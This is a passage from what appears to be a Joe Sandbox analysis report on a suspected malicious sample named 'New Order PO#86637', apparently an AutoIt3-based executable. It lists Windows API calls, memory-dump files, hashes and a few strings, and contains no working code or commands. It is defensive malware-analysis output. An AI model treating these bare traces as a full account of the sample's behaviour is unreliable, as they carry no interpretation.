                                                                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1597257046-0
                                                                            • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                            • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                            • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                            • String ID:
                                                                            • API String ID: 237123855-0
                                                                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyObject$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 3349847261-0
                                                                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 2223660684-0
                                                                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                            APIs
                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                            • LineTo.GDI32(?,?,?), ref: 00447326
                                                                            • EndPath.GDI32(?), ref: 00447336
                                                                            • StrokePath.GDI32(?), ref: 00447344
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 2783949968-0
                                                                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00472B63
                                                                            • GetDC.USER32(00000000), ref: 00472B6C
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00472BB2
                                                                            • GetDC.USER32(00000000), ref: 00472BBB
                                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 00415150
                                                                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                            • __freeptd.LIBCMT ref: 0041516B
                                                                            • ExitThread.KERNEL32 ref: 00415173
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1454798553-0
                                                                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _strncmp
                                                                            • String ID: Q\E
                                                                            • API String ID: 909875538-2189900498
                                                                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 2652923123-3941886329
                                                                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove_strncmp
                                                                            • String ID: U$\
                                                                            • API String ID: 2666721431-100911408
                                                                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                            APIs
                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                            • __wcsnicmp.LIBCMT ref: 00467288
                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                            • String ID: LPT
                                                                            • API String ID: 3035604524-1350329615
                                                                            • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                            • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                            • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                            • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
